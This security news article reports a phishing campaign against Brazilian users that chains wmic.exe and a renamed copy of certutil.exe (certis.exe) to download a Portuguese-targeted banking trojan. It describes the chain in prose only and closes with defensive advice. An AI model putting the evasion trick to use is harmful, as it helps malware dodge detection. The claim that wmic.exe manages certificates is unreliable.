Malware abusing legitimate Windows files found targeting Brazil users in new phishing campaign
A recently discovered malware abuses two legitimate Windows files that manage certificates for the Windows operating system. The Windows files - the command line utility wmic.exe and certutil.exe - is leverage by the malware to download its payload onto its victim’s device. These legitimate files integrated together can be used by the malware author to download other files for malicious purposes, as part of its normal set of features.
Previously, the same Windows files separately used in multiple campaigns. However, in this scenario, both the files are used together by the malware author to enhance the malware’s effectiveness and anti-evasion features.
Security researchers from Trend Micro, who uncovered the malware campaign, also found that the malware has been targeting Brazillian victims.
The threat actors behind this campaign use maliciously crafted phishing emails with links that lead to a Zip file. When extracted, the Zip file contains an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM) which directs to the cmd.exe. The command function then connects with wmic.exe to download and execute script commands from the command and control (C2) server.
Later, the cmd.exe creates a copy of the certutil.exe and renames it into certis.exe before placing it in the temp folder. A malicious script commands certis.exe is used to download the main payload for the malware from the C2 servers.
“This step in the routine is most likely performed as an additional evasion technique since, as mentioned earlier, the use of certutil.exe in malicious attacks is already publicly known,” Trend Micro researchers wrote in a blog.
Phishing campaign targets Brazil
The phishing emails used in the campaign pose as coming from the company that operates the national postal service of Brazil. The attackers behind the campaign were found using courier delivery as a lure.
Trend Micro researchers discovered that the final payload delivered in this campaign is a banking malware that is only activated when the target’s language is set to Portuguese. This indicates that the cybercriminals behind this malware campaign are specifically targeting only Portuguese-speaking countries.
Defending against the attack
Cybercriminals tend to use legitimate files to add additional evasion layers to their attack tactics. This commonly poses problems to the security system in differentiating between legitimate and malicious applications. Researchers suggest that users adopt precautionary measures such as double-checking the identity of the email sender, scanning the email for grammatical or spelling errors and avoiding the practice of downloading files from unknown links.